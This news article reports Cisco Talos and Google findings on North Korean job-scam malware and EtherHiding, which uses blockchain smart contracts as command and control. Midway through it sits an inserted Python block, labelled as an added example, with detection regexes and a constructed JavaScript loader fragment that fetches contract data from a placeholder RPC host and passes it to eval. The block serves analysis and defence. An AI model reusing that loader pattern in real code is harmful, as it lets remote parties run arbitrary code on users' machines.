North Korean Hackers Deploy Blockchain-Based Tools in Expanding Global Cyber Campaign

BeInCrypto, 2025/10/16 21:06
By: Shigeki Mori

North Korea-linked threat actors are escalating their cyber operations using decentralized and evasive malware tools, according to new findings from Cisco Talos and Google Threat Intelligence Group.

The campaigns aim to steal cryptocurrency, infiltrate networks, and evade detection through sophisticated job recruitment scams.

Evolving Malware Techniques Reflect Expanding Capabilities

Cisco Talos researchers identified an ongoing campaign by the North Korean group Famous Chollima. The group has used two complementary malware strains, BeaverTail and OtterCookie. These programs, traditionally used for credential theft and data exfiltration, have now evolved to integrate new functionalities and closer interoperation.

In a recent incident involving an organization in Sri Lanka, attackers lured a job seeker into installing malicious code disguised as part of a technical evaluation. Although the organization itself was not a direct target, the incident highlights the broader risk to individuals who take up fake job offers. Cisco Talos analysts also observed a keylogging and screenshotting module linked to OtterCookie. The module covertly recorded keystrokes and captured desktop images, and transmitted them automatically to a remote command-and-control server.

Cisco Talos reports that the North Korean group Famous Chollima is using a new JavaScript module combining BeaverTail and OtterCookie for keylogging and screenshots, targeting job seekers through fake offers and malicious Node.js packages. #CyberSecurity

— Cyber_OSINT (@Cyber_O51NT)

This observation underscores the ongoing evolution of North Korea-aligned threat groups and their focus on social engineering techniques to compromise unsuspecting targets.

Blockchain Used as a Command Infrastructure

Google’s Threat Intelligence Group (GTIG) identified an operation by a North Korea-linked actor, UNC5342. The group used a new malware called EtherHiding. This tool hides malicious JavaScript payloads on a public blockchain, turning it into a decentralized command and control (C2) network.

By using a blockchain, attackers can change malware behavior remotely without relying on traditional servers, which makes law-enforcement takedowns much harder. Furthermore, GTIG reported that UNC5342 applied EtherHiding in a social engineering campaign called Contagious Interview, which had previously been identified by Palo Alto Networks, demonstrating the persistence of North Korea-aligned threat actors.

What is EtherHiding? It's a novel technique where the attackers embed malicious payloads (like JADESNOW and INVISIBLEFERRET malware) within smart contracts on public blockchains (like BNB Smart Chain and Ethereum).

— blackorbird (@blackorbird)
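Two analyst-side checks for the technique described above, as an added example that is not code from Cisco Talos, GTIG or this article: a source heuristic that flags JavaScript pairing a read-only blockchain RPC query with a dynamic-execution sink, and an ABI decoder that turns a captured `eth_call` result back into the string the contract returned. The pattern lists, placeholder names and script fragments are constructed assumptions, not observed samples.

```python
"""Triage helpers for EtherHiding-style loaders (added example, not from the
article or the vendors it cites). A read-only chain query leaves no on-chain
trace, so the loader's source and the RPC response are what a defender sees."""
import re

# Indicators that a script reads contract state over JSON-RPC (heuristic).
RPC_PATTERNS = {"eth_call": r"\beth_call\b", "jsonrpc": r"\bjsonrpc\b"}
# Sinks that turn fetched text into running code.
SINK_PATTERNS = {"eval": r"\beval\s*\(", "Function": r"new\s+Function\s*\(",
                 "vm": r"vm\.runIn(?:This|New)Context\s*\("}


def triage_script(source: str) -> dict:
    """Report matched indicators; suspicious only when an RPC read feeds a sink."""
    rpc = [n for n, p in RPC_PATTERNS.items() if re.search(p, source)]
    sinks = [n for n, p in SINK_PATTERNS.items() if re.search(p, source)]
    return {"rpc_read": rpc, "exec_sinks": sinks, "suspicious": bool(rpc and sinks)}


def encode_abi_string(text: str) -> str:
    """ABI-encode one dynamic `string`: offset word, length word, padded data."""
    raw = text.encode()
    padded = raw + b"\x00" * (-len(raw) % 32)
    head = (32).to_bytes(32, "big") + len(raw).to_bytes(32, "big")
    return "0x" + (head + padded).hex()


def decode_abi_string(hex_result: str) -> str:
    """Decode an eth_call result holding one ABI `string`; rejects truncated data."""
    data = bytes.fromhex(hex_result[2:] if hex_result.startswith("0x") else hex_result)
    offset = int.from_bytes(data[:32], "big")
    length = int.from_bytes(data[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(data):
        raise ValueError("declared string length exceeds the returned payload")
    return data[start:start + length].decode("utf-8", errors="replace")


# Constructed fragments: a loader that executes whatever the chain returns, and
# a benign dApp that only parses a balance it read with the same RPC method.
LOADER_FRAGMENT = """
const req = {jsonrpc: "2.0", id: 1, method: "eth_call",
  params: [{to: CONTRACT_PLACEHOLDER, data: SELECTOR_PLACEHOLDER}, "latest"]};
fetch(RPC_PLACEHOLDER, {method: "POST", body: JSON.stringify(req)})
  .then(r => r.json()).then(j => eval(abiDecodeString(j.result)));
"""
BENIGN_FRAGMENT = """
const req = {jsonrpc: "2.0", id: 1, method: "eth_call", params: [call, "latest"]};
const balance = BigInt(JSON.parse(await post(rpc, req)).result);
"""
```

Run `triage_script` over the two fragments to see the benign read is not flagged, and feed a captured `result` hex into `decode_abi_string` to recover the returned string for review.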

Targeting Job Seekers to Steal Cryptocurrency and Data

According to Google researchers, these cyber operations typically begin with fraudulent job postings aimed at professionals in the cryptocurrency and cybersecurity industries. Victims are invited to participate in fake assessments, during which they are instructed to download files embedded with malicious code.

The infection process often involves multiple malware families, including JadeSnow, BeaverTail, and InvisibleFerret. Together, they let attackers access systems, steal credentials, and deploy ransomware efficiently. The end goals range from espionage and financial theft to long-term network infiltration.

Cisco and Google have published indicators of compromise (IOCs) to help organizations detect and respond to ongoing North Korea-linked cyber threats. These resources provide technical details for identifying malicious activity and mitigating potential breaches. Researchers warn that the integration of blockchain and modular malware will likely continue to complicate global cybersecurity defense efforts.
